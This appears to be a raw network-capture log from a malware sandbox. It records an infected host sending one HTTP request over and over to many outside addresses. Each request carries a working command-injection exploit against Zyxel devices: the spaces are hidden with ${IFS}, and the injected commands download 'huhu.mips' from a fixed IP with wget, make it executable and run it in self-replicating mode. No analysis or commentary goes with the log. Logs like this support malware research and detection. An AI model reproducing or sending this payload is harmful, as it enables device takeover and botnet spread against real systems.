                                                  Jan 19, 2024 18:23:42.780436039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1252192.168.2.1336392192.132.135.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780499935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1253192.168.2.135680684.157.188.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780534983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1254192.168.2.134476813.236.178.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780556917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1255192.168.2.134907294.67.174.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780606985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1256192.168.2.134013231.54.55.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780642033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1257192.168.2.1339580151.103.89.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780692101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1258192.168.2.135959072.131.179.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780720949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1259192.168.2.1344254104.233.228.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780759096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1260192.168.2.1338646164.219.6.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780786037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1261192.168.2.1333074137.35.86.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780838966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1262192.168.2.135508417.43.240.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780877113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1263192.168.2.1333814213.148.164.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780919075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1264192.168.2.1349844217.92.124.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780947924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1265192.168.2.135854485.70.30.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781003952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1266192.168.2.135829685.23.157.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781040907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1267192.168.2.133627023.255.77.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781081915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1268192.168.2.1357460104.83.12.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781120062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1269192.168.2.134226690.180.41.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781152010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1270192.168.2.134965685.249.124.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781198978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1271192.168.2.1334408121.243.249.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781255007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1272192.168.2.1334088138.61.224.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781308889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1273192.168.2.1351138109.13.38.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781342030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1274192.168.2.1335036101.168.81.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781373978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1275192.168.2.134167272.40.96.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781399012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1276192.168.2.1360410181.199.39.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781439066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1277192.168.2.1342184132.112.147.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781467915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1278192.168.2.1334490143.248.246.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781512976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1279192.168.2.134095879.56.246.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781569004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1280192.168.2.1336734110.223.51.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781591892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1281192.168.2.1359042218.244.193.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781645060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1282192.168.2.1335366107.102.14.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781688929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1283192.168.2.1338130216.198.172.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781709909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1284192.168.2.1352250110.250.208.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781749010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1285192.168.2.1359174158.5.132.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781791925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1286192.168.2.133470879.27.33.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781848907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1287192.168.2.135399491.251.108.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781903028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1288192.168.2.1356312105.144.208.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781939030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1289192.168.2.1334414164.132.110.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.781975031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1290192.168.2.135420478.50.74.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782027960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1291192.168.2.1351266115.65.20.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782058001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1292192.168.2.1348580142.210.127.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782104969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1293192.168.2.1347368170.206.188.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782138109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1294192.168.2.1360434187.211.108.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782180071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1295192.168.2.1358892109.35.155.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782216072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1296192.168.2.133280853.217.178.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782267094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1297192.168.2.135231835.26.19.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782294035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1298192.168.2.135922080.45.248.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782360077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1299192.168.2.1339216106.125.29.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782402039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1300192.168.2.1336508169.166.85.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782444954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1301192.168.2.1354702218.22.64.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782495975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1302192.168.2.1351382223.114.61.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782527924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1303192.168.2.133938288.40.16.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782566071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1304192.168.2.134832857.155.132.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782602072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1305192.168.2.1347940213.78.57.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782649040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1306192.168.2.1343812199.220.87.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782687902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1307192.168.2.133635453.37.252.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782723904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1308192.168.2.135929812.216.237.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782777071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1309192.168.2.1355528183.216.213.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782819986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1310192.168.2.135252063.56.166.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782913923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1311192.168.2.1358708218.224.16.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.782955885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1312192.168.2.1357032218.182.239.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783010006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1313192.168.2.1343654142.26.160.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783042908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1314192.168.2.133609838.176.192.38443
                                                  TimestampBytes transferredDirectionData
